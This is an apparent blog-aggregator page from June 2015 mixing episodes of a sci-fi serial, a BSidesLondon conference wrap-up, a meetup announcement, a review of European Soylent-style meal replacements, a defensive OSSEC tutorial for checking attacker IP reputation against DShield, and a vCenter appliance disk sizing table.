— It's not impossible, but those prisoners never numbered more than a few thousand, scattered across the whole asteroid belt. Far too few to create an industry.
— But why not put the tele-pass to work? And who on earth makes these damn obsolete toys?
— The tele-pass are very protected: they have families, friends. And they are incompetent. If we train them, they will start to think, to destabilize the system. If we exploit them, it would eventually get out. That is why I am convinced that these damn toys, as you say, are produced by humans who suffer, exploited humans. Maybe children. I am convinced that this asteroid story is nothing but a smokescreen used to hide a shameful trade with the Islamist sultanate.
— What? You mean that the Muslims...
— What could be more logical? They have no scruples, no social security. They have labor and raw materials. On the other hand, the whole region is a desert heavily polluted by oil and radioactive fallout. So they are literally starving.
— That's... that's awful!
— Yes. That is why the printer is an essential tool. It will allow us to put an end to this odious trade.
— But we must denounce it right away! We must stop this immediately.
— Nellio, everything we buy, everything we use comes from these hidden factories. Your clothes, your neurex, your computer. Without them, we are nothing anymore. Without them, it will become obvious that the tele-pass do useless work. Our whole society could collapse! Chaos! Anarchy!

For a moment I thought they were talking about the asteroid, but the sentences are complex, the words strange. Shifting my weight to hear better, I knock my helmet with my hand. It rolls across the floor with a thunderous noise that echoes through the whole hangar. The two men freeze and turn sharply toward me.

— But what the...
— Who...

I heave myself up and, keeping my gaze fixed on the tips of my toes, deliver an improvised introduction:
— G89, at your orders, chief!

 

Photo by Photophilde.

Thank you for taking the time to read this freely priced post. Feel free to support me with a few milliBitcoins, a handful of euros, or by following me on Tipeee, Twitter, Google+ and Facebook!

This text is published by Lionel Dricot under the CC-By BE license.

Flattr this!

by Lionel Dricot at June 08, 2015 04:40 PM

June 07, 2015

Frank Goossens

Video: how to install & use WP YouTube Lyte by Webucator

Webucator, creator of online and onsite training classes, just released this video about the installation and use of WP YouTube Lyte:

YouTube Video
Watch this video on YouTube or on Easy Youtube.

by frank at June 07, 2015 05:55 AM

June 05, 2015

Frank Goossens

Music from Our Tube: Django Django shaking, trembling & rolling

Look and listen to this nice new Django Django video:
YouTube Video
Watch this video on YouTube or on Easy Youtube.

by frank at June 05, 2015 04:27 AM

June 03, 2015

Xavier Mertens

BSidesLondon 2015 Wrap-Up

Here is a quick wrap-up of the just-finished BSidesLondon. It was already the 5th edition (and my 5th participation!). This year, they moved to a new location close to Earls Court, where InfoSec Europe is organized at the same time. A good idea for those who want to attend both worlds: hackers wearing t-shirts vs. vendors wearing ties! This year, it was just a one-day trip for me; I'm writing this blog post while waiting for my train back to Belgium.

I arrived late due to transport constraints and missed the keynote, but I was just in time to attend the first half-day of talks. The first one was presented by Freaky Clown: “How I rob banks”. We follow each other on Twitter, so it was a good opportunity to also meet him in real life. Working as a pentester, he gave a presentation about physical security and how easy it can be to enter a “secured” building (notice the quotes!). Like a network, once you get in, it's often game over. Freaky Clown reviewed various mistakes, how badly security controls, gates or receptions are deployed, and how easy it is to “abuse” people into letting you enter a restricted area. All the cases were illustrated with funny pictures and stories. The conclusion of this talk could be: information security or physical security, both fail! Bad implementations, lack of controls, procedures, installations left in “test” or “debug” mode... On that note, I liked the example of the super-safe gate which was left in test mode and operated its doors by itself every x minutes. Just be patient and walk in...

The second talk was about POS (“Point of Sale”) terminals. You know, the portable device with a card reader and a PIN pad which allows you to perform transactions with your credit/debit cards. If I remember well, this was a lightning talk in 2014, but Grigorios Fragkos came back with a talk full of juicy information. A first remark: to perform this kind of research, access to devices is mandatory, and they're not easy to get and use. This must of course be done in a lab environment. Playing with people's money can cause you some trouble :-). The talk was a series of abuse scenarios that can be performed with POS terminals, like:

There are plenty of POS models on the market and most of them are easy to abuse. Of course, Grigorios did not disclose names, which is understandable. No need for magic or reverse-engineering-fu: some good combinations of keys pressed in the right order and at the right moment are enough to clear the transaction cache or to uninstall the OS... Brilliant and scary at the same time! I will never look at a POS device the same way again. A special mention for the careless people who post pictures of their brand new customized credit cards... Grigorios wrote a small Python tool which can generate valid credit-card numbers even when some digits are missing...

The last talk before the lunch break was given by Stephen Bonner, a regular speaker at BSidesLondon. He based his talk on clips from Hollywood movies and series.

Stephen on stage

As you can imagine, they are completely unrealistic, and the problem is that people like them and get false ideas of what information security is. He showed multiple funny clips from well-known movies and demonstrated how bad they are. How not to laugh when you hear stupid comments like this one from a famous US series:

I’ll create a GUI interface in VisualBasic, see if I can track an IP address…

The conclusion: People make decisions based on what they see! Talk about security in a clear way and not in the “Hollywood way“.

After a lunch and networking break, Javvad Malik came on stage with a talk called “Stay Secure my Friends – My Love-Hate relationship with secops”. As usual, Javvad put on a show with funny slides and facts.

Javvad on stage

He started in 1999 and still today, vendors are trying to sell us the same sh*t. Nothing really changed. It's just a question of rebranding, but our problems remain the same. But vendors were not the only ones targeted by Javvad; users and us, infosec professionals, got their share too. Some topics covered during the talk:

All of those were covered with funny (or nightmarish, depending on your side) stories. He concluded with some tips for us:

The next talk was presented by Joe Greenwood: “Crash all the things”. Joe was a pilot before he switched to the infosec field and knows his topic. That's why he decided to focus his research on the communication protocols used between airplanes, specifically the ones used in collision avoidance systems. All airplanes have radio systems which allow them to exchange critical information, and pilots get visual alerts when a risk of collision occurs. This system is based on the ADS-B and T-CAS protocols. Guess what? Those protocols are completely insecure (no encryption, no authentication, ...). For an airplane, any received ADS-B message must have been generated by another airplane! Why would it be anything else? :-) The fact that those protocols are “open” means that anybody can listen to them; that's why we have nice websites and apps like FlightRadar24.

The goal of Joe's research was to test whether it is possible to send bad messages to an airplane and generate false alerts in the cockpit. It's of course not easy to test that in real life. Joe built his lab with a HackRF (a classic device when you need to send some packets over the air) and GNURadio. The victim was a flight simulator. Modern simulators, being multiplayer, have features to receive ADS-B messages from third parties.

Joe on stage

Joe explained how ADS-B packets are constructed, and he wrote some tools to generate them on the fly. The presentation ended with a live demo of a Kali VM sending ADS-B messages to the flight simulator running on the same laptop. Crazy to suddenly see 10 ghost airplanes displayed on the radar! What about the countermeasures? While there are plenty of ground stations which can detect rogue flights, an airplane has only one antenna, which makes it always vulnerable. Can you imagine a Raspberry Pi or a BeagleBone with a HackRF dropped close to a big airport and remotely controlled? Very nice talk!

My next choice was to follow an introduction to the WifiPhisher tool by George Chatzisofroniou. Today, wireless networks are deployed everywhere and people use them all the time. This remains definitely a good attack vector, based on the following fact:

75% of the Americans would feel grumpier after one week without WiFi than without coffee!

Before speaking about the tool itself, George explained how it works (like any other app of the same kind). 802.11 has many weaknesses that keep it vulnerable to classic attacks even if encryption is used (WEP/WPA/WPA2). The management frames (beacon frames & probe requests) are always sent in the clear. What happens when a device sees two access points with the same ESSID? Usually, the network manager chooses the one with the stronger signal. Based on all this information, we are facing classic attacks like Karma and Evil Twin. Those were also explained by George. Nothing brand new, but always a good reminder. The second part of the talk focused on the WifiPhisher tool itself. It looks interesting because it integrates all the steps to collect passphrases and/or credentials from targeted users (a typical target for WifiPhisher is a user behind a captive portal). A nice feature is the detection mechanism that uses the access point's MAC address to serve the victim a specific fake webpage. Note that if you have a Pineapple, you can basically achieve the same results with extra infusions.

Then, Jessica Barker gave a non-technical but interesting talk: “Bringing Infosec to the masses”. She discussed the fact that we are speaking different languages. She started by speaking in Klingon. Nobody understood! It's the same in the information security field: we are talking to people in the wrong language. The goal is to reduce the gap between people and technology by using the right words to attract their attention. We, as infosec people, are trying to protect computers used by people who do not think like us!

Finally, the event was wrapped up with a talk about “Intelligence-led penetration testing” by Cam Buchanan. Why this talk? When a customer asks a pentester to test its security, the scope is often restricted to classic stuff like the perimeter, a DMZ, a website, etc. But for a while now, many organisations have been targeted by very malicious pieces of code which do not follow any rules and do not stick to a restricted scope. Cam's idea was to use the same techniques to perform the pentest. For each step of a classic attack, he reviewed how it can be applied to a “legal” pentest, with the caveats of each step. Interesting idea! IMHO, not all organisations are ready to allow such a broad and risky scope...

That's the wrap-up of the talks I attended. There were 3 slots in parallel (two main rooms and the rookie track) along with some workshops. From what I heard, the rookie track was very successful. I hope to see all the presentations online soon! Next event for me: BSidesLisbon in one month.

by Xavier at June 03, 2015 10:10 PM

June 02, 2015

Les Jeudis du Libre

Mons, June 18 – FusionDirectory: simplify the management of your infrastructure!

This Thursday, June 18, 2015 at 7 pm, the 40th Mons session of the Belgian Jeudis du Libre will take place.

The topic of this session: FusionDirectory: simplify the management of your infrastructure!

Theme: Infrastructure|System administration|Deployment|LDAP

Audience: everyone

Speaker: Benoit Mortier (OpenSides)

Location: Campus technique (ISIMs) of the Haute Ecole en Hainaut, Avenue V. Maistriau, 8a, Salle Académique, 2nd building (see the map on the ISIMs website, and here on the OpenStreetMap map).

Attendance is free and only requires registering by name, preferably in advance, or at the entrance to the session. Please indicate your intention by registering via the page http://jeudisdulibre.fikket.com/. The session will be followed by a friendly drink.

The Jeudis du Libre in Mons also benefit from the support of our partners: CETIC, Normation, OpenSides, MeaWeb, NextLab, Phonoid and Creative Monkeys.

If you are interested in this monthly series, do not hesitate to consult the agenda and to subscribe to the mailing list in order to receive all the announcements.

As a reminder, the Jeudis du Libre are meant to be spaces for exchange around Free Software topics. The Mons meetings take place every third Thursday of the month and are organized on the premises of, and in collaboration with, Mons colleges and university faculties involved in training computer scientists (UMONS, HEH and Condorcet), with the help of the non-profit LoLiGrUB, which is active in promoting free software.

Description: Today, the challenge is knowing how to manage the complexity and diversity of an IT infrastructure. It starts with centralizing information about users and their various accounts on several systems and goes all the way to deploying Linux- or Windows-based systems in different environments.

There are many in-house applications written to manage the data stored in your LDAP server, but most of them are hard to use or badly written, hard to maintain and require regular patches to work properly.

The FusionDirectory project aims to fill this gap by providing a pleasant web application that not only lets you manage your classic LDAP data such as users, groups, services..., but also offers an API for writing new plugins, to extend its functionality and match your needs.

Integration with other solutions is achieved by providing an interface that always works the same way. FusionDirectory is built from a core and a large set of plugins that handle much of the complexity of today's infrastructures. A list is available here.

During the talk, based on real-world use cases, we will show where FusionDirectory stands after 3 years of existence, where and how it is used to manage infrastructure, why we chose LDAP as the storage and, finally, what we have planned for the future.

by Didier Villers at June 02, 2015 09:27 PM

Lionel Dricot

Is eating still necessary?

3440941185_d205725d34_z

A study and comparison of the various substitutes for traditional food (Soylent-style) available in Europe.

It is amusing to see that the slightest questioning of your diet turns everyone around you into experienced dieticians ready to teach you how to live. You try a vegan diet? Everyone suddenly worries about your vitamin B12 intake, even those who had never heard of it and had never cared about it before. You suggest a vegetarian menu? Human beings are suddenly "naturally carnivorous", which should settle any debate.

In short, food is sacred; it is a religion. Questioning a lifetime of eating habits means running into the barrier of faith and turning the ayatollahs of tradition against you.

But fundamentally, what is the primary role of food? Answer: to provide your body with a series of nutrients.

Couldn't we optimize this by giving the body the nutrients it needs directly, rather than going through an extremely complex process that involves buying nutritious materials, storing them, preparing them, ingesting them according to a highly codified ritual, and finally cleaning all the tools involved?

After all, we already do it for animals: my vet assured me that kibble contains everything my cat needs. Ever since, I have been looking at my cat with envy. Why is there no kibble for humans?

That is exactly the challenge taken up by Soylent, an American startup whose goal is to offer a powder, to be mixed with water, that contains exactly what the body needs. I can see some of you jumping up already...

But we cannot measure precisely what our body needs. We are all different.

Indeed. But is traditional food any better in that respect? Do you have the slightest idea of the nutrients you have swallowed over the last 24 hours? Worse, our traditional diet tends to give us too much of certain types of nutrients, not enough of others, and also makes us ingest unnecessary substances that can turn out to be harmful (pesticides, certain preservatives or additives, ...).

If you started your day with a slice of bread with chocolate spread and a coffee, had a sandwich and a Coke at noon and finished with spaghetti bolognese, can you really claim that your diet was healthier than that of someone who spent the whole day on Soylent? Is it really better to eat cereal in the morning, a salad at noon and a three-course restaurant meal in the evening? The objective answer is that you have no idea; you rely on your feelings to decide what is good for you.

But a meal also has a social function!

Do all three of your daily meals have a social function? Really? If that were the case, fast food and sandwiches would not exist.

Historically, feeding ourselves takes so much time that it became traditional to combine that lost time with other functions: socializing, resting the body and the mind. But there is no link with meals other than habit. Decoupling the two can even be an excellent thing. I am often focused and productive while my body is hungry. That forces me to stop and take a break, breaking my rhythm. Later, when my mind is tired, I will feel guilty about taking a second break.

But eating is a pleasure. Cooking is an art.

Eating can indeed be a pleasure for some. There are also people for whom eating is simply a chore that life requires. Others enjoy it when they have the time but have other priorities in life. If eating is a pleasure for you, why not accept that others do without it? There are thousands of ways for humans to express their art, and every individual has the right to choose what suits them. After all, in-vitro fertilization has never threatened your sex life.

But...

In short, having never been particularly attracted to food, the Soylent concept appealed to me right away and I decided to test it. Soylent is not yet available in Europe, but since the formula is open and free, many startups have drawn inspiration from it. For you, my dear readers, I therefore decided to test the European alternatives to Soylent.

Joylent (NL)

Joylent is currently the leader on the European market and the first one I tested. The product aims to be fun and comes in 4 flavors: strawberry, banana, vanilla and chocolate.

joylent1

A crate of Joylent (photo from the Joylentfor30days blog)

Using milk protein as a base, Joylent is slightly cloying. The taste is very sweet and the flavorings feel quite artificial. Drinking Joylent therefore has to be done calmly, and it will not please everyone. That said, you get used to it fairly quickly.

The effect is rather strange: hunger does not seem entirely satisfied, yet you feel no craving. Unlike after a normal meal, there is no drowsiness and no glycemic spike. Surprisingly, I noticed no mid-afternoon cravings. When hunger really returns, it is usually at the time of the next meal.

Joylent comes in bags of 3 portions, which is not very practical but noticeably reduces waste. Deliveries are fast and support is extremely responsive. A meal costs €2.

Note that Joylent is working on a vegan version without dairy products.

Mana (CZ)

Mana is another alternative that is getting a lot of attention. Unlike Joylent, Mana aims to be serious, high quality and guaranteed GMO-free. Mana is not flavored and is not based on milk. The powder is therefore entirely vegan. On the other hand, Mana has to be mixed with oil, supplied in small bottles. The original oil was a blend of vegetable oil and fish oil. It is now entirely vegetable-based, which makes Mana compatible with a vegan diet.

MANA-front-starter

Unlike Joylent, Mana is not powdery but made of "flakes" that sink to the bottom of the glass. The bottom of the glass feels like eating a kind of porridge.

Of all the solutions tested, Mana is the only one that gave me a serious post-meal slump. I had to lie down and take a nap. When I woke up, I was starving. Not a very conclusive experience, then.

Orders take a particularly long time to be delivered (several weeks). The bags contain three portions and come with small graduated oil bottles, also containing 3 portions. A meal comes to around €3.50.

Queal (NL)

Just like Joylent, Queal is Dutch. But the resemblance does not stop there: Queal is really very close to Joylent. A milk protein base (so not vegan) but a greater variety of flavors.

Unlike Joylent, the flavors seem less artificial. Some are even downright good (I love the chocolate-peanut one) and there is a "neutral" flavor with no added flavoring that is perfect for mixing with the stronger ones.

Queal-Product-Shott

You need to add a spoonful of vegetable oil. The oil is supplied as a single bottle that you have to dose by eye. A bit less practical, then.

In terms of effect, Queal seems slightly more filling to me than Joylent. In my experience, Queal is the best suited before sport: it does not weigh you down, it satisfies hunger and it provides energy for several hours. A Queal at 2 pm to replace my lunch let me hold out effortlessly, without cravings and without the slightest other intake, until 8 pm during an intense afternoon of cycling.

Queal is delivered in bags of 3 portions (€2 per portion), but these portions are so large that 3.5 portions seems closer to the truth. Support is responsive and delivery is fast, even if the overall image is less dynamic and more marketing-oriented than Joylent, which really tries to stay close to its consumers. Note that Queal is also guaranteed GMO-free.

Jake (NL)

Staying with the Dutch, Jake wins the prize for serious work: very practical single-serving bags (though therefore less ecological), detailed nutritional values on the website and on the bags, a very informative blog on nutrition, a responsive Twitter account. All of it 100% vegan at €3.50 per portion.

JakeOriginalR340

The downside? The taste. There is only one flavor, vanilla, and it is pretty vile. It feels like drinking ultra-sweet vanilla soy milk... in powder form. It is borderline nauseating. And, unfortunately, it is not very filling: after 2 hours, you are starving.

Jake is without a doubt the big disappointment of this test.

Veetal (DE)

At the opposite end from Jake, the Veetal website gives almost no information. And the leaflet that comes with the bags is entirely in German. Some information is particularly well hidden: Veetal is not vegan, because it contains milk protein. On the other hand, it is guaranteed GMO-free.

veetal_soylent

You also need to add oil, which is not supplied. The bags contain three portions and come to €3 per meal.

Unlike Jake, the taste is a pleasant surprise: it is the only product in this test with a hint of saltiness, which is not at all unpleasant. The taste is neutral, a balanced salty/sweet mix that goes down easily.

The others

There are plenty of other variants. On my list, I also noted:

Conclusion

Ce qui m’a fortement marqué avec cette expérience c’est, comme annoncé, l’efficacité. Si, comme moi, vous n’êtes pas un maniaque du goût, un Joylent ou un Queal apporte la valeur nutritive d’un repas avec un temps de préparation de l’ordre de la minute !

The biggest surprise was realising that I could be productive in the afternoon, without the famous post-meal slump. I had no idea digestion was using up that much of my energy.

On days when I have a Soylent-like for lunch, I no longer feel the need to raid the chocolate cupboard at 4pm. I also eat far fewer ready meals, sandwiches, frozen pizzas or bowls of pasta. My partner, who is nevertheless passionate about cooking, finds this alternative particularly handy on days when her business leaves her no time to eat properly. Before sport, Soylent-likes have proven an ideal and cheap solution.

In terms of productivity, both intellectual and athletic, Soylent-likes have been a real revelation and bring me a new level of comfort that I would now find hard to give up.

Of course, I still enjoy a restaurant or a meal with friends or family. But I now see those more as special occasions. I feel more like eating good things than eating in quantity. The urge to eat is less present and, surprisingly, after a big feast I am glad to be able to do a "Soylent diet" day to give my digestive system a rest.

A digestive system which, between us, is doing much better by the way. I have particularly irritable bowels and the soylents seem to be a blessing for them. Although, fair warning, the short adaptation period to this kind of food does come with a certain propensity for flatulence.

Photo by l@mie. This article received no support from any of the brands mentioned and required a non-negligible investment to obtain a representative sample. If you found it interesting, feel free to contribute.

Thank you for taking the time to read this freely-paid post. Feel free to support me with a few milliBitcoins, a handful of euros, or by following me on Tipeee, Twitter, Google+ and Facebook!

This text is published by Lionel Dricot under the CC-By BE licence.

Flattr this!

by Lionel Dricot at June 02, 2015 04:53 PM

Xavier Mertens

Playing with IP Reputation with Dshield & OSSEC

Reputation
[This blogpost has also been published as a guest diary on isc.sans.org]

When investigating incidents or searching for malicious activity in your logs, IP reputation is a nice way to increase the reliability of generated alerts. It can help to prioritize incidents. Let’s take an example with a WordPress blog. It will, sooner or later, be targeted by a brute-force attack on the default /wp-admin page. In this case, IP reputation can be helpful: an attack performed from an IP address already reported as actively scanning the Internet will attract little of my attention. On the contrary, if the same kind of attack comes from an unknown IP address, this could be more suspicious…

By using a reputation system, our monitoring tool can tag an IP address with a label like “reported as malicious” based on a repository. The real value of this repository depends directly on the value of the collected information. I’m a big fan of dshield.org, a free service provided by the SANS Internet Storm Center. The service works thanks to the data submitted by many people across the Internet. For years, I have also been pushing my firewall logs to dshield.org from my OSSEC server. I wrote a tool to achieve this: ossec2dshield. Having contributed to the system, it’s now time to get some benefit from my participation: I’m re-using the database to automatically check the reputation of the IP addresses attacking me. We come full circle!

To achieve this, let’s use the API provided on isc.sans.org and the OSSEC feature called “Active-Response”, which allows a script to be triggered when a set of conditions is met. In the example below, we call the reputation script with our attacker’s address for any alert with a level >= 6.

<command>
    <name>isc-ipreputation</name>
    <executable>isc-ipreputation.py</executable>
    <expect>srcip</expect>
    <timeout_allowed>no</timeout_allowed>
</command>
<active-response>
    <!-- Collect IP reputation data from ISC API
      -->
    <command>isc-ipreputation</command>
    <location>server</location>
    <level>6</level>
</active-response>

(Check the Active-Response documentation for details)

The ISC API can be used to query information about an IP address. The returned results are:

$ wget -O - -q https://isc.sans.edu/api/ip/195.154.243.219?json
{"ip":{"abusecontact":"unknown","number":"195.154.243.219","country":" FR ","as":"12876 ","asname":" AS12876 ONLINE S.A.S.,FR","network":" 195.154.0.0\/16 ","comment":null}}

The most interesting fields are:

The script “isc-ipreputation.py” can be used from the command line or from an OSSEC Active-Response configuration block. To reduce the number of requests against the API, a SQLite database is created and populated with a local copy of the data. Existing IP addresses will only be checked again after a specified TTL (time-to-live), by default 5 days. Data is also dumped to a flat file or Syslog for further processing by another tool. Here is an example entry:

$ tail -f /var/log/ipreputation.log
[2015-05-27 23:30:07,769] DEBUG No data found, fetching from ISC
[2015-05-27 23:30:07,770] DEBUG Using proxy: 192.168.254.8:3128
[2015-05-27 23:30:07,772] DEBUG Using user-agent: isc-ipreputation/1.0 (blog.rootshell.be)
[2015-05-27 23:30:09,760] DEBUG No data found, fetching from ISC
[2015-05-27 23:30:09,761] DEBUG Using proxy: 192.168.254.8:3128
[2015-05-27 23:30:09,762] DEBUG Using user-agent: isc-ipreputation/1.0 (blog.rootshell.be)
[2015-05-27 23:30:10,138] DEBUG Saving 178.119.0.173
[2015-05-27 23:30:10,145] INFO IP=178.119.0.173, AS=6848("TELENET-AS Telenet N.V.,BE"), Network=178.116.0.0/14, Country=BE, Count=148, AttackedIP=97, Trend=0, FirstSeen=2015-04-21, LastSeen=2015-05-27, Updated=2015-05-27 18:37:15

In this example, you can see that this IP address started attacking on the 21st of April. It was reported 148 times while attacking 97 different IP addresses (this IP is almost certainly part of a botnet).
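
To make the flow concrete, here is a minimal sketch, assuming Python 3, of how such an Active-Response helper could query the ISC API and cache answers in SQLite with a TTL. This is illustrative only, not the actual isc-ipreputation.py; the function name and table layout are made up:

#!/usr/bin/env python3
# Illustrative sketch: query the ISC API for an IP address and cache the
# answer in a local SQLite database so the API is not hit on every alert.
import json, sqlite3, sys, time, urllib.request

TTL = 5 * 24 * 3600  # re-query an IP after 5 days, the default TTL mentioned above

def lookup(ip, db='/data/ossec/logs/isc-ipreputation.db'):
    conn = sqlite3.connect(db)
    conn.execute('CREATE TABLE IF NOT EXISTS ip (ip TEXT PRIMARY KEY, data TEXT, updated INTEGER)')
    row = conn.execute('SELECT data, updated FROM ip WHERE ip = ?', (ip,)).fetchone()
    if row and time.time() - row[1] < TTL:
        return json.loads(row[0])                     # cached entry is still fresh
    with urllib.request.urlopen('https://isc.sans.edu/api/ip/%s?json' % ip) as r:
        data = json.loads(r.read().decode())          # same JSON as the wget example above
    conn.execute('REPLACE INTO ip (ip, data, updated) VALUES (?, ?, ?)',
                 (ip, json.dumps(data), int(time.time())))
    conn.commit()
    return data

if __name__ == '__main__':
    print(lookup(sys.argv[1]))

In a real Active-Response deployment the attacker's IP arrives as one of the script's command-line arguments rather than sys.argv[1] alone; the idea stays the same.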

The script can be configured with a YAML configuration file (defaulting to /etc/isc-ipreputation.conf) which is very easy to understand:

logging:
  debug: yes
database:
  path: '/data/ossec/logs/isc-ipreputation.db'
network:
  exclude-ip: '192\.168\..*|172\.16\..*|10\..*|fe80:.*'
  ttl-days: 5
http:
  proxy: '192.168.254.8:3128'
  user-agent: 'isc-ipreputation/1.0 (blog.rootshell.be)'

Finally, the SQLite database can be used to extract interesting statistics. For example, to get the top 10 suspicious IP addresses that attacked me (and their associated countries):

$ sqlite3 isc-ipreputation.db 
SQLite version 3.8.2 2013-12-06 14:53:30
Enter ".help" for instructions
Enter SQL statements terminated with a ";"
sqlite> select ip, count, attacks,country from ip order by count desc limit 10;
61.240.144.66|4507455|32533|CN
218.77.79.43|2947146|63295|CN
61.240.144.65|2408418|24185|CN
61.240.144.64|1947038|22054|CN
61.240.144.67|1759210|25421|CN
184.105.139.67|1678608|63055|US
61.160.224.130|1553361|62140|CN
61.183.128.6|1385025|13829|CN
61.160.224.129|1312580|15202|CN
61.160.224.128|1209176|61006|CN
sqlite>

It is also very easy to generate dynamic lists of IP addresses (or CDBs, as OSSEC calls them). The following command will generate a CDB list with my top 10 malicious IP addresses:

$ sqlite3 isc-ipreputation.db \
"select ip from ip order by count desc limit 10;"| \
while read IP;
do
echo "$IP:Suspicious";
done >/data/ossec/lists/bad-ips
$ cat /data/ossec/lists/bad-ips
61.240.144.66:Suspicious
218.77.79.43:Suspicious
61.240.144.65:Suspicious
61.240.144.64:Suspicious
61.240.144.67:Suspicious
184.105.139.67:Suspicious
61.160.224.130:Suspicious
61.183.128.6:Suspicious
61.160.224.129:Suspicious
61.160.224.128:Suspicious
$ ossec-makelists
* File lists/bad-ips.cdb needs to be updated

Based on this list, you can add more granularity to your alerts by correlating the attacks with the CDB list. Note that dshield.org offers a recommended block list ready to use. A few months ago, Richard Porter explained how to integrate one of them into a Palo Alto Networks firewall. This is a great resource, but I think both approaches are complementary.

The script is available on my github repository.

by Xavier at June 02, 2015 01:35 PM

Frederic Hornain

[Brussels] Red Hat JBoss Fuse Service Works Free hands-on lab on June 04 2015

Red Hat Benelux Workshop

 

Red Hat JBoss Middleware Hands-On Labs, join us for a free hands-on lab at one of our Benelux locations


Have you ever wondered how to get started with the Red Hat JBoss Middleware products? Are you unsure where to begin?
Would you like to receive information, but prefer to work with the products on the spot?
Join us for one of our free JBoss Hands-on Labs (formerly known as Red Hat in-house Hackathons).
The next one will be on JBoss Fuse @ Arrow – http://www.arrowecs.be
on Thursday June 04 2015 from 17:00
Woluwedal 30, Sint-Stevens-Woluwe, Brussels – 3rd floor

fuseserviceworks_workshop

 

/!\ Do not forget to register at the following URL :

http://www.redhatonline.com/benelux/workshops.php

Kind Regards

Frederic


by Frederic Hornain at June 02, 2015 09:08 AM

Bert de Bruijn

VCSA detailed sizing options

The vCenter Server Appliance in vSphere 6 can be deployed as "tiny", "small", "medium", and "large". The deployment wizard gives info about the vCPU and vRAM consequences of this choice, and about the total disk size of the appliance. But as there are 11 (eleven!) disks attached to the VCSA appliance, it's worth looking into which disks get a different size.

                              Tiny     Small    Medium
Max hosts                     10       100      400
Max VMs                       100      1000     4000
vCPU                          2        4        8
vRAM (GB)                     8        16       24
Total disk size (GB)          120      150      300
disk0  / and /boot            12       12       12
disk1  /tmp/mount             1.3      1.3      1.3
disk2  swap                   25       25       50
disk3  /storage/core          25       50       50
disk4  /storage/log           10       10       25
disk5  /storage/db            10       10       25
disk6  /storage/dblog         5        5        10
disk7  /storage/seat          10       25       50
disk8  /storage/netdump       1        1        10
disk9  /storage/autodeploy    10       10       25
disk10 /storage/invsvc        5        10       25
(per-disk sizes in GB)

N.B. I currently don't have the config data for "large".
This table can help if your environment is growing slightly or wildly beyond the original sizing of the VCSA. Using the autogrow command in @lamw's article, you can easily grow the relevant parts of the VCSA VM.

by Bert de Bruijn (noreply@blogger.com) at June 02, 2015 07:55 AM

June 01, 2015

Lionel Dricot

Printeurs 30

12067487545_107f43edcf_z
This is post 30 of 31 in the Printeurs series

Using an avatar, Nellio has made it to the printer in his secret lab. He has started printing the mysterious memory card. But the police, led by Georges Farreck, are at the door.

 

The laboratory door has just blown open. Panicking, I turn around. The printer is in full action: a terrible wind sweeps through the room, a storm-like roar buzzes in my ears, the printing liquid is boiling.

The shouts of the police reach me. I risk a glance over the mountain of debris that serves as my barricade. A rocket shoots out of my arm and explodes in flames at their feet.
— But…
— It's me, Junior's voice reassures me. I'm controlling the weapons. Just keep looking at them, I'll lay down the fire. Most of your defence is handled by automatic algorithms anyway.

A deluge of fire and screams is unleashed towards the entrance of the laboratory. I feel totally passive, disconnected. Disoriented, I turn my head in every direction in vain. Gunfire bursts from my hands, my torso and my head, but I control none of it. A police uniform I hadn't seen suddenly appears in front of me. He must have crawled along the walls. My heart stops for a moment as I watch him raise a weapon towards my face. I see three brief flashes before hearing three detonations. I feel nothing. Under the helmet, the face falls apart. The face of a young woman in her twenties, like every young woman I have ever known.
— Shit! An avat…
A red hole appears on her forehead and, as if in slow motion, I watch her eyes roll back. She attempts one last incredulous jolt before collapsing at my feet, her strangely disjointed arms soaking in the printer's vat. Her open eyes keep staring at me from beyond death. I killed her! I killed a human being! Or was it just a police officer? Am I really the guilty one? Is it my body? And who controls it? Who pulled the trigger? Junior, the algorithm or my own subconscious?

A violent explosion rings out and the scene seems to freeze. A thick silence settles over our old laboratory. Only the lapping of the printer still reaches me.
— First wave repelled, Junior announces. They're pulling back to prepare the second wave. That can take several hours. Classic tactic when they hit unexpected resistance. They probably think there are several of us; that will give us a chance to slip away. How's the printing coming along?

I look down. In the makeshift vat, a reddish, stringy mass has appeared, while the lifeless body of the police officer seems to be decomposing.
— In the name of the processor! A human body!
The red of the muscles is quickly covered by dark, matte skin. I almost scream.
— Eva!
The sound has barely left my temporary metal lips when her eyes open. For an eternity, her gaze seems fixed on the ceiling. I dare not make the slightest movement; time has stopped.

And then, abruptly, her face emerges from the printing liquid and she starts to scream. A raw, inhuman scream, a snarl, an agony. She screams as she thrashes and contorts. Her naked body slides out of the improvised bathtub. Lying on the floor, she seems to catch her breath with difficulty. With her fingertips, she touches her skin, her forearm, her face. And starts screaming again.

Awkwardly, I move closer and try to reassure her.
— Eva! Eva! It's me, Nellio!
Her wide, frightened eyes meet my electronic gaze. I can feel she's trying to tell me something, but her lips are nothing but a cry of infinite distress. Junior's voice reaches me. He sounds in shock.
— Shit… Nellio… Don't tell me that…
— Yes, it's Eva. She scanned herself to save her skin.
— Shit… Shit… Shit… That's unbelievable!
— But it wasn't supposed to work on living beings…
— Well, if you ask me, it doesn't seem to work all that well. Or at least, it's extremely painful.

Leaving him to his soliloquy punctuated with "Shit!", I wrap my arms around Eva. Tearing a piece of some fabric from the rubble, I cover her shoulders and hold her against me. Tirelessly, I murmur.
— Eva, it's me, Nellio!
Her long scream finally subsides and turns into jerky sobbing. Her breathing seems laboured, forced. She turns a tear-flooded face towards me. Her trembling lips struggle to form a word. She swallows, spits, coughs and finally articulates:
— Nel… lio?
— Yes, Eva, it's me!
Her eyes close and she falls, inert, into my arms.
— Eva? Eva?
I try to wake her, to bring her back to consciousness. A wave of panic washes over me. What if the printer really doesn't work on living beings?
— Eva? Eva?
Moving my hand away, I notice a small red wound on her shoulder, exactly where I was holding her.
— What the…
— Don't worry, Nellio, I gave her a sedative. We have to get out of here before the second wave.
— What? A sedative? But you may have killed her, you bastard! You know nothing about her body and…
— Stop! You stop right now! We'll settle our scores later. For the moment, we have a common interest: getting the avatar and Eva to safety. The rest can wait.

I must be dreaming! Eva comes back to life, this guy kills her right away, and he expects me to obey him? What kind of madness is this?
— Bastard, you're a traitor, I knew it from the start, you…

No sound comes out of my lips any more. Around me, everything has suddenly become dark and calm. I am in a hangar. Against the wall facing me I can vaguely make out a row of motionless silhouettes. Avatars! However hard I try to turn my head, my gaze is locked in place. I want to move forward, to move at all. Nothing doing: my avatar seems disconnected. I scream, but no sound reaches me. A thick feeling of claustrophobia grips my chest. Eva and Junior have gone from my mind; I can think of only one thing: moving, or getting out of this switched-off body!

